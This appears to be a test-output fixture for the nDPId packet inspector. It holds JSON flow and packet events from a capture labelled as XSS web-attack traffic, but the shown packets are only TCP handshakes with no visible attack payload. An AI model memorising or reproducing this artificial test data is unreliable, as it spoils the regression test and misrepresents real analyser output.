-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4603,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347519679,"flow_last_seen":1499347519679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347519679,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4603,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":1,"flow_last_seen":1499347519679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347519679,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A+RAAD4GweysEAABwKgKMuLOAFBZkgEfAAAAAKACchAc\/gAAAgQFtAQCCAoBOwL7AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4604,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":2,"flow_last_seen":1499347519679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347519679,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4s4k\/bw4WZIBIKAScSBkUQAAAgQFtAQCCAoD5NRxATsC+wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4605,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":325,"flow_packet_id":3,"flow_last_seen":1499347519680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347519680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A+VAAD4GwfOsEAABwKgKMuLOAFBZkgEgJP28OYAQAOUDWAAAAQEICgE7AvwD5NRx"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4621,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347522204,"flow_last_seen":1499347522204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347522204,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58088,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4621,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":1,"flow_last_seen":1499347522204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347522204,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8G91AAD4GqfOsEAABwKgKMuLoAFAaMR6uAAAAAKACchA8PgAAAgQFtAQCCAoBOwVzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":2,"flow_last_seen":1499347522204,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347522204,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4uhHWnn+GjEer6AScSCg9wAAAgQFtAQCCAoD5NboATsFcwEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":326,"flow_packet_id":3,"flow_last_seen":1499347522205,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347522205,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0G95AAD4GqfqsEAABwKgKMuLoAFAaMR6vR1p5\/4AQAOU\/\/wAAAQEICgE7BXMD5Nbo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347523488,"flow_last_seen":1499347523488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347523488,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58102,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":1,"flow_last_seen":1499347523488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347523488,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bP1AAD4GWNOsEAABwKgKMuL2AFCTdmpJAAAAAKACchB2DgAAAgQFtAQCCAoBOwa0AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":2,"flow_last_seen":1499347523488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347523488,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4vYacquOk3ZqSqAScSDU3gAAAgQFtAQCCAoD5NgpATsGtAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4635,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":327,"flow_packet_id":3,"flow_last_seen":1499347523489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347523489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bP5AAD4GWNqsEAABwKgKMuL2AFCTdmpKGnKrj4AQAOVz5gAAAQEICgE7BrQD5Ngp"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347524782,"flow_last_seen":1499347524782,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347524782,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58116,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":1499347524782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347524782,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uUBAAD4GDJCsEAABwKgKMuMEAFAFWr63AAAAAKACchCuawAAAgQFtAQCCAoBOwf3AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4649,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":2,"flow_last_seen":1499347524782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347524782,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4wR+L\/VQBVq+uKAScSBeeAAAAgQFtAQCCAoD5NltATsH9wEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4650,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":3,"flow_last_seen":1499347524783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347524783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uUFAAD4GDJesEAABwKgKMuMEAFAFWr64fi\/1UYAQAOX9fwAAAQEICgE7B\/cD5Nlt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347526155,"flow_last_seen":1499347526155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526155,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58130,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":1499347526155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347526155,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vM5AAD4GCQKsEAABwKgKMuMSAFBd27WBAAAAAKACchBdugAAAgQFtAQCCAoBOwlPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4658,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":2,"flow_last_seen":1499347526155,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347526155,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4xLVlk4tXdu1gqAScSBcLAAAAgQFtAQCCAoD5NrEATsJTwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":3,"flow_last_seen":1499347526156,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347526156,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vM9AAD4GCQmsEAABwKgKMuMSAFBd27WC1ZZOLoAQAOX7MwAAAQEICgE7CU8D5NrE"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347395736,"flow_last_seen":1499347401725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56738,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347398258,"flow_last_seen":1499347403725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56764,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347399514,"flow_last_seen":1499347404726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347400752,"flow_last_seen":1499347406726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347403327,"flow_last_seen":1499347408726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56818,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4663,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347404575,"flow_last_seen":1499347409726,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347526161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347527425,"flow_last_seen":1499347527425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347527425,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4666,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":1499347527425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347527425,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84vtAAD4G4tSsEAABwKgKMuMgAFAAyeh3AAAAAKACchCGiwAAAgQFtAQCCAoBOwqMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":2,"flow_last_seen":1499347527425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347527425,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4yBtIXfPAMnoeKAScSDCkwAAAgQFtAQCCAoD5NwBATsKjAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":3,"flow_last_seen":1499347527426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347527426,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04vxAAD4G4tusEAABwKgKMuMgAFAAyeh4bSF30IAQAOVhmwAAAQEICgE7CowD5NwB"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347528679,"flow_last_seen":1499347528679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347528679,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4678,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":1499347528679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347528679,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86w9AAD4G2sCsEAABwKgKMuMuAFDPaODJAAAAAKACchC+UQAAAgQFtAQCCAoBOwvGAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":2,"flow_last_seen":1499347528679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347528679,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ4y4jZsPUz2jgyqAScSD21QAAAgQFtAQCCAoD5N07ATsLxgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":3,"flow_last_seen":1499347528680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347528680,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06xBAAD4G2sesEAABwKgKMuMuAFDPaODKI2bD1YAQAOWV3QAAAQEICgE7C8YD5N07"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347531303,"flow_last_seen":1499347531303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347531303,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":1499347531303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347531303,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MvhAAD4GktisEAABwKgKMuNIAFARgDytAAAAAKACchAdrgAAAgQFtAQCCAoBOw5VAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":2,"flow_last_seen":1499347531303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347531303,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ40hb80TSEYA8rqAScSCaFwAAAgQFtAQCCAoD5N\/LATsOVQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4703,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":3,"flow_last_seen":1499347531304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347531304,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MvlAAD4Gkt+sEAABwKgKMuNIAFARgDyuW\/NE04AQAOU5HgAAAQEICgE7DlYD5N\/L"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347532560,"flow_last_seen":1499347532560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347532560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":1,"flow_last_seen":1499347532560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347532560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ro1AAD4GF0OsEAABwKgKMuNWAFA1F6EdAAAAAKACchCUXQAAAgQFtAQCCAoBOw+QAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":333,"flow_packet_id":2,"flow_last_seen":1499347532560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347532560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ41Zu3G2tNRehHqAScSDTyAAAAgQFtAQCCAoD5OEFATsPkAEDAwc="} 